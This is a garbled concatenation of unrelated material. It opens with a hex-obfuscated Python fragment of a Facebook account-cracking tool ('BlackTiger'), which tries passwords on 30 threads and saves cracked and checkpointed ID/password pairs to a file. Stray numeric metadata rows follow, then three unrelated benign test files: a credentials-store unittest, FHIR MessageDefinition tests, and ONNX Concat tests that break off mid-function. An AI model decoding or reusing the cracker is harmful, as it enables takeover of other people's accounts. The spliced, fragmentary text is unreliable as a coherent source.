E7420275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D270909090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616
D65275D0909090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737339202B20275C6E270909090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737339290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
02020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737339202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373392B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373392909090A09090909090909090909090909090909090A0909090909090909090909090909090A09096578636570743A0A090909706173730A09090A0970203D20546872656164506F6F6C283330290A09702E6D6170286D61696E2C206964290A234465763A426C61636B54696765722D4572726F723430340A20202020202020207072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5
F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A097072696E7420275C3033335B313B39376D5B2B5D5C3033335B313B34376D205C3033335B313B33316D50726F6365737320486173204265656E20436F6D706C657465645C3033335B313B306D270A097072696E74225C3033335B313B39376D5B2B5D5C3033335B313B39376D546F74616C205C3033335B313B39376D4F4B2F5C7831625B313B39376D4350205C3033335B313B39376D3A205C3033335B313B39376D222B737472286C656E286F6B7329292B225C3033335B313B39376D2F5C3033335B313B39376D222B737472286C656E2863656B706F696E7429290A097072696E7420225C3033335B313B39376DC2AB2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DC2BB220A097072696E74202222220A205C3033335B313B39376D0A5C3033335B313B39376D20E29688E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E295972020202020E29688E29688E295972020202020E29688E29688E29597202020E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29597E29688E29688E295972020E29688E29688E295970A5C3033335B313B39376DE29688E29688E29594E29590E29590E29590E29590E2959D20E29688E29688E29594E29590E29590E29590E29688E29688E29597E29688E29688E29594E29590E29590E29688E29688E2959720202020E29688E29688E295912020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E29594E29590E29590E29590E29590E2959DE29688E29688E2959120E29688E29688E29594E2959D0A5C3033335B313B39376DE29688E29688E295912020E29688E29688E29688E29597E29688E29688E29591202020E29688E29688E29591E2959AE29688E29688E29688E29688E29688E29594E2959D20202020E29688E29688E295912020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E295912020202020E29688E29688E29688E29688E29688E29594E2959D200A5C3033335B313B39376DE29688E29688E29591202020E29688E29688E29591E29688E29688E29591202020E29688E29688E29591E29688E29688E29594E29590E29590E29688E29688E2959720202020E29688E29688E295912020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E295912020202020E29688E29688E29594E29590E29688E
29688E29597200A5C3033335B313B39376DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29594E2959D20202020E29688E29688E29688E29688E29688E29688E29688E29597E2959AE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29688E29597E29688E29688E295912020E29688E29688E295970A5C3033335B313B39376D20E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E2959D2020202020E2959AE29590E29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959DE2959AE29590E2959D2020E2959AE29590E2959D0A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A5C3033335B313B39316D20E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29688E2959720E29688E29688E2959720E29688E29688E29597E29688E29688E295972020E29688E29688E295970A5C3033335B313B39326DE29688E29688E29594E29590E29688E29688E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29597E29688E29688E29594E29590E29688E29688E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29591E2959AE29590E29590E29590E29590E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29597E29688E29688E29594E29590E29590E29590E29590E2959DE29688E29688E29688E29591E29688E29688E29688E29591E29688E29688E295912020E29688E29688E295910A5C3033335B313B39336DE29688E29688E29591E29688E29688E29594E29688E29688E2959120E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29591E29688E29688E29594E29688E29688E2959120E29688E29688E29688E29688E29688E29
594E2959D20202020E29688E29688E29594E2959D20E29688E29688E29688E29688E29688E29594E2959D20E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29688E29597E2959AE29688E29688E29591E2959AE29688E29688E29591E29688E29688E29688E29688E29688E29688E29688E295910A5C3033335B313B39346DE29688E29688E29688E29688E29594E2959DE29688E29688E2959120E2959AE29590E29590E29590E29688E29688E29597E29688E29688E29688E29688E29594E2959DE29688E29688E2959120E2959AE29590E29590E29590E29688E29688E29597202020E29688E29688E29594E2959D2020E2959AE29590E29590E29590E29688E29688E2959720E2959AE29590E29590E29590E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E2959120E29688E29688E2959120E29688E29688E29591E2959AE29590E29590E29590E29590E29688E29688E295910A5C3033335B313B39356DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29594E2959D202020E29688E29688E295912020E29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29688E2959120E29688E29688E2959120E29688E29688E295912020202020E29688E29688E295910A5C3033335B313B39366D20E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D20202020E2959AE29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E29590E2959D20E2959AE29590E2959D20E2959AE29590E2959D2020202020E2959AE29590E2959D2020202020200A2222220A097072696E7420225C3033335B313B39376DC2AB2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DC2BB220A097261775F696E70757428225C6E5C3033335B313B39376D5B2B5D5C3033335B313B39376D4261636B22290A096D656E7528290A0A6966205F5F6E616D655F5F203D3D20275F5F6D61696E5F5
F273A0A096C6F67696E28290A67696E28290A'))
| 30,685
| 92,040
| 0.999891
| 6
| 92,055
| 15,340.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.871594
| 0.000033
| 92,055
| 2
| 92,041
| 46,027.5
| 0.12833
| 0
| 0
| 0
| 0
| 0
| 0.999555
| 0.999555
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
67aa5ec955a22fe30621f9fb949b1f49c00f9857
| 3,904
|
py
|
Python
|
test/test_credentials.py
|
Zoltan93/bcr-api
|
f21dfa0c73879a476b29e640f1af2aeea564afaa
|
[
"MIT"
] | 10
|
2020-11-06T04:32:37.000Z
|
2022-01-09T01:57:29.000Z
|
test/test_credentials.py
|
Zoltan93/bcr-api
|
f21dfa0c73879a476b29e640f1af2aeea564afaa
|
[
"MIT"
] | 17
|
2020-02-24T15:09:28.000Z
|
2022-02-14T09:31:55.000Z
|
test/test_credentials.py
|
Zoltan93/bcr-api
|
f21dfa0c73879a476b29e640f1af2aeea564afaa
|
[
"MIT"
] | 23
|
2020-02-03T15:50:32.000Z
|
2021-07-20T21:16:05.000Z
|
# coding=utf-8
import tempfile
import unittest
from pathlib import Path
from bcr_api.credentials import CredentialsStore
ACCESS_TOKEN = "00000000-0000-0000-0000-000000000000"
class TestCredentialsStore(unittest.TestCase):
    """Unit tests for ``CredentialsStore``.

    Each test receives a fresh store backed by a ``tokens.txt`` file inside a
    temporary directory, so tests are isolated and leave nothing on disk.
    Covers lazy file creation, basic get/set, multiple and overwritten
    entries, and case-insensitive handling of the e-mail key.
    """

    def with_credential_store(function):
        """Decorator: invoke *function* with a temp-dir-backed store.

        Note: this is deliberately a plain function used at class-definition
        time (not a bound method) — ``function`` is the undecorated test and
        the returned ``wrapper`` becomes the actual test method.
        """
        def wrapper(self):
            with tempfile.TemporaryDirectory() as temp_dir:
                token_path = Path(temp_dir) / "tokens.txt"
                store = CredentialsStore(credentials_path=token_path)
                function(self, store)
        return wrapper

    @with_credential_store
    def test_file_created_on_read(self, store):
        """Backing file is created lazily on first read (iteration)."""
        self.assertFalse(store._credentials_path.exists())
        _ = [c for c in store]
        self.assertTrue(store._credentials_path.exists())

    @with_credential_store
    def test_file_created_on_write(self, store):
        """Backing file is created on first write."""
        self.assertFalse(store._credentials_path.exists())
        store["example@example.com"] = ACCESS_TOKEN
        self.assertTrue(store._credentials_path.exists())

    @with_credential_store
    def test_store(self, store):
        """A stored token is retrievable and counted."""
        self.assertEqual(len(store), 0)
        store["example@example.com"] = ACCESS_TOKEN
        self.assertEqual(store["example@example.com"], ACCESS_TOKEN)
        self.assertEqual(len(store), 1)

    @with_credential_store
    def test_store_multiple(self, store):
        """Distinct keys hold distinct tokens independently."""
        self.assertEqual(len(store), 0)
        store["example@example.com"] = "10000000-0000-0000-0000-000000000000"
        store["another-example@example.com"] = "20000000-0000-0000-0000-000000000000"
        self.assertEqual(
            store["example@example.com"], "10000000-0000-0000-0000-000000000000"
        )
        self.assertEqual(
            store["another-example@example.com"], "20000000-0000-0000-0000-000000000000"
        )
        self.assertEqual(len(store), 2)

    @with_credential_store
    def test_store_overwrite(self, store):
        """Re-assigning a key replaces the previous token."""
        self.assertEqual(len(store), 0)
        store["example@example.com"] = "10000000-0000-0000-0000-000000000000"
        store["example@example.com"] = "20000000-0000-0000-0000-000000000000"
        self.assertEqual(
            store["example@example.com"], "20000000-0000-0000-0000-000000000000"
        )

    @with_credential_store
    def test_store_same(self, store):
        """Writing the same token twice is a no-op for the value."""
        self.assertEqual(len(store), 0)
        store["example@example.com"] = ACCESS_TOKEN
        store["example@example.com"] = ACCESS_TOKEN
        self.assertEqual(store["example@example.com"], ACCESS_TOKEN)

    @with_credential_store
    def test_store_case_insensitive(self, store):
        """Keys differing only in case collapse to a single entry."""
        store["example@example.com"] = ACCESS_TOKEN
        store["EXAMPLE@EXAMPLE.COM"] = ACCESS_TOKEN
        store["eXaMpLe@ExAmPlE.cOm"] = ACCESS_TOKEN
        self.assertEqual(len(store), 1)

    @with_credential_store
    def test_store_lower(self, store):
        """Lower-case write, lower-case read."""
        store["example@example.com"] = ACCESS_TOKEN
        self.assertEqual(store["example@example.com"], ACCESS_TOKEN)

    @with_credential_store
    def test_store_upper(self, store):
        """Upper-case write is readable via the lower-case key."""
        store["EXAMPLE@EXAMPLE.COM"] = ACCESS_TOKEN
        self.assertEqual(store["example@example.com"], ACCESS_TOKEN)

    @with_credential_store
    def test_store_mixed(self, store):
        """Mixed-case write is readable via the lower-case key."""
        store["eXaMpLe@ExAmPlE.cOm"] = ACCESS_TOKEN
        self.assertEqual(store["example@example.com"], ACCESS_TOKEN)

    @with_credential_store
    def test_get_lower(self, store):
        """Lower-case read of a lower-case write."""
        store["example@example.com"] = ACCESS_TOKEN
        self.assertEqual(store["example@example.com"], ACCESS_TOKEN)

    @with_credential_store
    def test_get_upper(self, store):
        """Upper-case read resolves to the lower-case entry."""
        store["example@example.com"] = ACCESS_TOKEN
        self.assertEqual(store["EXAMPLE@EXAMPLE.COM"], ACCESS_TOKEN)

    @with_credential_store
    def test_get_mixed(self, store):
        """Mixed-case read resolves to the lower-case entry."""
        store["example@example.com"] = ACCESS_TOKEN
        self.assertEqual(store["eXaMpLe@ExAmPlE.cOm"], ACCESS_TOKEN)
| 33.367521
| 88
| 0.682633
| 458
| 3,904
| 5.611354
| 0.144105
| 0.152529
| 0.185214
| 0.222568
| 0.829183
| 0.829183
| 0.803113
| 0.784436
| 0.72179
| 0.696887
| 0
| 0.084751
| 0.2021
| 3,904
| 116
| 89
| 33.655172
| 0.740289
| 0.003074
| 0
| 0.552941
| 0
| 0
| 0.217481
| 0.087918
| 0
| 0
| 0
| 0
| 0.258824
| 1
| 0.176471
| false
| 0
| 0.047059
| 0
| 0.247059
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db2b3350c02d0e89aa3ffc7982a6c0fd81ea4809
| 8,674
|
py
|
Python
|
fhir/resources/STU3/tests/test_messagedefinition.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 144
|
2019-05-08T14:24:43.000Z
|
2022-03-30T02:37:11.000Z
|
fhir/resources/STU3/tests/test_messagedefinition.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 82
|
2019-05-13T17:43:13.000Z
|
2022-03-30T16:45:17.000Z
|
fhir/resources/STU3/tests/test_messagedefinition.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 48
|
2019-04-04T14:14:53.000Z
|
2022-03-30T06:07:31.000Z
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/MessageDefinition
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import messagedefinition
def impl_messagedefinition_1(inst):
    """Pin every field of the ``messagedefinition-example.json`` fixture.

    ``inst`` is a parsed STU3 ``MessageDefinition`` resource; each assertion
    checks one field against the known fixture value.
    """
    assert inst.category == "Notification"
    assert inst.contact[0].telecom[0].system == "url"
    assert inst.contact[0].telecom[0].value == "http://hl7.org"
    # DateTime fields are compared through the fhirtypes validator.
    assert inst.date == fhirtypes.DateTime.validate("2016-11-09")
    assert inst.event.code == "communication-request"
    assert inst.event.system == "http://hl7.org/fhir/message-events"
    assert inst.experimental is True
    assert inst.id == "example"
    assert inst.name == "EXAMPLE"
    assert inst.publisher == "Health Level Seven, Int'l"
    # NOTE(review): 'MessageDefintion' typo matches the fixture text — keep as-is.
    assert (
        inst.purpose == "Defines a base example for other MessageDefintion instances."
    )
    assert inst.responseRequired is False
    assert inst.status == "draft"
    assert inst.text.div == (
        '<div xmlns="http://www.w3.org/1999/xhtml">Message '
        "definition base example</div>"
    )
    assert inst.text.status == "generated"
    assert inst.title == "Message definition base example"
    assert inst.url == "http://hl7.org/fhir/MessageDefinition/example"
def test_messagedefinition_1(base_settings):
    """Round-trip test No. 1 for MessageDefinition.

    Test File: messagedefinition-example.json
    """
    source = base_settings["unittest_data_dir"] / "messagedefinition-example.json"
    parsed = messagedefinition.MessageDefinition.parse_file(
        source, content_type="application/json", encoding="utf-8"
    )
    assert parsed.resource_type == "MessageDefinition"
    impl_messagedefinition_1(parsed)
    # Round-trip: serialize the instance and rebuild it from its own dict.
    payload = parsed.dict()
    assert payload["resourceType"] == "MessageDefinition"
    rebuilt = messagedefinition.MessageDefinition(**payload)
    impl_messagedefinition_1(rebuilt)
def impl_messagedefinition_2(inst):
    """Pin every field of the patient-link-notification fixture.

    ``inst`` is a parsed STU3 ``MessageDefinition`` built from
    ``messagedefinition-patient-link-notification.json``.
    """
    assert (
        inst.allowedResponse[0].message.reference
        == "MessageDefinition/patient-link-response"
    )
    # Adjacent string literals are concatenated by the compiler.
    assert inst.allowedResponse[0].situation == (
        "Optional response message that may provide additional " "information"
    )
    assert inst.base.reference == "MessageDefinition/example"
    assert inst.category == "Notification"
    assert inst.contact[0].telecom[0].system == "url"
    assert inst.contact[0].telecom[0].value == "http://hl7.org"
    # NOTE(review): '�' looks like a mojibake '©' from the fixture encoding — confirm.
    assert inst.copyright == "� HL7.org 2011+"
    assert inst.date == fhirtypes.DateTime.validate("2017-02-03")
    assert inst.description == (
        "Notification of two patient records that represent the same "
        "individual that require an established linkage."
    )
    assert inst.event.code == "patient-link"
    assert inst.event.system == "http://hl7.org/fhir/message-events"
    assert inst.experimental is True
    assert inst.focus[0].code == "Patient"
    assert inst.focus[0].max == "2"
    assert inst.focus[0].min == 2
    assert inst.focus[0].profile.reference == "StructureDefinition/example"
    assert inst.id == "patient-link-notification"
    assert inst.identifier.system == "urn:ietf:rfc:3986"
    assert inst.identifier.value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.9878"
    assert inst.jurisdiction[0].coding[0].code == "US"
    assert inst.jurisdiction[0].coding[0].display == "United States of America (the)"
    assert inst.jurisdiction[0].coding[0].system == "urn:iso:std:iso:3166"
    assert inst.name == "PATIENT-LINK-NOTIFICATION"
    assert inst.parent[0].reference == "ActivityDefinition/example"
    assert inst.publisher == "Health Level Seven, Int'l"
    assert inst.purpose == (
        "Notifies recipient systems that two patients have been "
        "'linked' - meaning they represent the same individual"
    )
    assert inst.replaces[0].reference == "MessageDefinition/example"
    assert inst.responseRequired is False
    assert inst.status == "draft"
    assert inst.text.div == (
        '<div xmlns="http://www.w3.org/1999/xhtml">Link Patients ' "Notification</div>"
    )
    assert inst.text.status == "generated"
    assert inst.title == "Link Patients Notification"
    assert inst.url == (
        "http://hl7.org/fhir/MessageDefinition/patient-link-" "notification"
    )
    assert inst.useContext[0].code.code == "focus"
    assert inst.useContext[0].code.system == "http://hl7.org/fhir/usage-context-type"
    assert inst.useContext[0].valueCodeableConcept.coding[0].code == "positive"
    assert (
        inst.useContext[0].valueCodeableConcept.coding[0].system
        == "http://hl7.org/fhir/variant-state"
    )
    assert inst.version == "1"
def test_messagedefinition_2(base_settings):
    """Round-trip test No. 2 for MessageDefinition.

    Test File: messagedefinition-patient-link-notification.json
    """
    source = (
        base_settings["unittest_data_dir"]
        / "messagedefinition-patient-link-notification.json"
    )
    parsed = messagedefinition.MessageDefinition.parse_file(
        source, content_type="application/json", encoding="utf-8"
    )
    assert parsed.resource_type == "MessageDefinition"
    impl_messagedefinition_2(parsed)
    # Round-trip: serialize the instance and rebuild it from its own dict.
    payload = parsed.dict()
    assert payload["resourceType"] == "MessageDefinition"
    rebuilt = messagedefinition.MessageDefinition(**payload)
    impl_messagedefinition_2(rebuilt)
def impl_messagedefinition_3(inst):
    """Pin every field of the patient-link-response fixture.

    ``inst`` is a parsed STU3 ``MessageDefinition`` built from
    ``messagedefinition-patient-link-response.json``.
    """
    assert inst.base.reference == "MessageDefinition/example"
    assert inst.category == "Consequence"
    assert inst.contact[0].telecom[0].system == "url"
    assert inst.contact[0].telecom[0].value == "http://hl7.org"
    # NOTE(review): '�' looks like a mojibake '©' from the fixture encoding — confirm.
    assert inst.copyright == "� HL7.org 2011+"
    assert inst.date == fhirtypes.DateTime.validate("2017-02-03")
    assert inst.description == "Optional response to a patient link notification."
    assert inst.event.code == "patient-link"
    assert inst.event.system == "http://hl7.org/fhir/message-events"
    assert inst.experimental is True
    assert inst.focus[0].code == "Patient"
    assert inst.focus[0].max == "2"
    assert inst.focus[0].min == 2
    assert inst.focus[0].profile.reference == "StructureDefinition/example"
    assert inst.id == "patient-link-response"
    assert inst.identifier.system == "urn:ietf:rfc:3986"
    assert inst.identifier.value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.9879"
    assert inst.jurisdiction[0].coding[0].code == "US"
    assert inst.jurisdiction[0].coding[0].display == "United States of America (the)"
    assert inst.jurisdiction[0].coding[0].system == "urn:iso:std:iso:3166"
    assert inst.name == "PATIENT-LINK-RESPONSE"
    assert inst.parent[0].reference == "ActivityDefinition/example"
    assert inst.publisher == "Health Level Seven, Int'l"
    assert inst.purpose == (
        "Optional response message that may provide additional "
        "information on the outcome of the patient link operation."
    )
    assert inst.replaces[0].reference == "MessageDefinition/example"
    assert inst.responseRequired is False
    assert inst.status == "draft"
    assert inst.text.div == (
        '<div xmlns="http://www.w3.org/1999/xhtml">Link Patients ' "Response</div>"
    )
    assert inst.text.status == "generated"
    assert inst.title == "Link Patients Response"
    assert inst.url == "http://hl7.org/fhir/MessageDefinition/patient-link-response"
    assert inst.useContext[0].code.code == "focus"
    assert inst.useContext[0].code.system == "http://hl7.org/fhir/usage-context-type"
    assert inst.useContext[0].valueCodeableConcept.coding[0].code == "positive"
    assert (
        inst.useContext[0].valueCodeableConcept.coding[0].system
        == "http://hl7.org/fhir/variant-state"
    )
    assert inst.version == "1"
def test_messagedefinition_3(base_settings):
    """Round-trip test No. 3 for MessageDefinition.

    Test File: messagedefinition-patient-link-response.json
    """
    source = (
        base_settings["unittest_data_dir"]
        / "messagedefinition-patient-link-response.json"
    )
    parsed = messagedefinition.MessageDefinition.parse_file(
        source, content_type="application/json", encoding="utf-8"
    )
    assert parsed.resource_type == "MessageDefinition"
    impl_messagedefinition_3(parsed)
    # Round-trip: serialize the instance and rebuild it from its own dict.
    payload = parsed.dict()
    assert payload["resourceType"] == "MessageDefinition"
    rebuilt = messagedefinition.MessageDefinition(**payload)
    impl_messagedefinition_3(rebuilt)
| 41.304762
| 87
| 0.694028
| 1,051
| 8,674
| 5.686013
| 0.189343
| 0.152276
| 0.023427
| 0.02577
| 0.836345
| 0.817102
| 0.803213
| 0.793173
| 0.757028
| 0.70666
| 0.000231
| 0.03278
| 0.173507
| 8,674
| 209
| 88
| 41.502392
| 0.80053
| 0.079202
| 0
| 0.580838
| 0
| 0.011976
| 0.315935
| 0.070348
| 0
| 0
| 0
| 0
| 0.580838
| 1
| 0.035928
| false
| 0
| 0.017964
| 0
| 0.053892
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db2d04d8c07825d87e5322134be89d6cd930c973
| 6,025
|
py
|
Python
|
tests/unit_tests/test_nn/test_converters/test_onnx/test_Concat.py
|
samysweb/dnnv
|
58fb95b7300914d9da28eed86c39eca473b1aaef
|
[
"MIT"
] | 5
|
2022-01-28T20:30:34.000Z
|
2022-03-17T09:26:52.000Z
|
tests/unit_tests/test_nn/test_converters/test_onnx/test_Concat.py
|
samysweb/dnnv
|
58fb95b7300914d9da28eed86c39eca473b1aaef
|
[
"MIT"
] | 9
|
2022-01-27T03:50:28.000Z
|
2022-02-08T18:42:17.000Z
|
tests/unit_tests/test_nn/test_converters/test_onnx/test_Concat.py
|
samysweb/dnnv
|
58fb95b7300914d9da28eed86c39eca473b1aaef
|
[
"MIT"
] | 2
|
2022-02-03T17:32:43.000Z
|
2022-03-24T16:38:49.000Z
|
import numpy as np
import onnxruntime
from dnnv.nn.converters.onnx import *
from dnnv.nn.operations import *
def test_Concat_consts():
    """Concat of two constant 1-D int arrays along axis 0."""
    lhs = np.arange(5)
    rhs = np.arange(10, 20)
    model = convert(OperationGraph([Concat([lhs, rhs], 0)]))
    outputs = onnxruntime.backend.run(model, [])
    assert len(outputs) == 1
    expected = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
    assert np.all(outputs[0] == expected)
def test_Concat_x0_is_op():
    """Concat where the first operand is a graph input and the second a constant."""
    lhs_value = np.arange(5)
    rhs = np.arange(10, 20)
    lhs_input = Input((5,), np.dtype(np.int64))
    model = convert(OperationGraph([Concat([lhs_input, rhs], 0)]))
    outputs = onnxruntime.backend.run(model, [lhs_value])
    assert len(outputs) == 1
    expected = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
    assert np.all(outputs[0] == expected)
def test_Concat_x1_is_op():
    """Concat where the second operand is a graph input and the first a constant."""
    lhs = np.arange(5)
    rhs_value = np.arange(10, 20)
    rhs_input = Input((10,), np.dtype(np.int64))
    model = convert(OperationGraph([Concat([lhs, rhs_input], 0)]))
    outputs = onnxruntime.backend.run(model, [rhs_value])
    assert len(outputs) == 1
    expected = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
    assert np.all(outputs[0] == expected)
def test_Concat_x0_x1_are_op():
    """Concat where both operands are graph inputs fed at run time."""
    lhs_value = np.arange(5)
    rhs_value = np.arange(10, 20)
    lhs_input = Input((5,), np.dtype(np.int64))
    rhs_input = Input((10,), np.dtype(np.int64))
    model = convert(OperationGraph([Concat([lhs_input, rhs_input], 0)]))
    outputs = onnxruntime.backend.run(model, [lhs_value, rhs_value])
    assert len(outputs) == 1
    expected = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
    assert np.all(outputs[0] == expected)
def test_Concat_1d():
    """Concat of two 1-D float32 constants along axis 0 and axis -1."""
    x0 = np.array([1, 2], dtype=np.float32)
    x1 = np.array([3, 4], dtype=np.float32)

    def run_concat(axis):
        # Convert a constant Concat to ONNX and execute it with no feeds.
        model = convert(OperationGraph([Concat([x0, x1], axis)]))
        outputs = onnxruntime.backend.run(model, [])
        assert len(outputs) == 1
        return outputs[0]

    expected = np.array([1, 2, 3, 4], dtype=np.float32)
    assert np.all(run_concat(0) == expected)
    assert np.all(run_concat(-1) == expected)
def test_Concat_2d():
    """Concat of two 2x2 float32 constants along each axis, incl. negatives."""
    x0 = np.array([[1, 2], [3, 4]], dtype=np.float32)
    x1 = np.array([[5, 6], [7, 8]], dtype=np.float32)

    def run_concat(axis):
        # Convert a constant Concat to ONNX and execute it with no feeds.
        model = convert(OperationGraph([Concat([x0, x1], axis)]))
        outputs = onnxruntime.backend.run(model, [])
        assert len(outputs) == 1
        return outputs[0]

    stacked_rows = np.array([[1, 2], [3, 4], [5, 6], [7, 8]], dtype=np.float32)
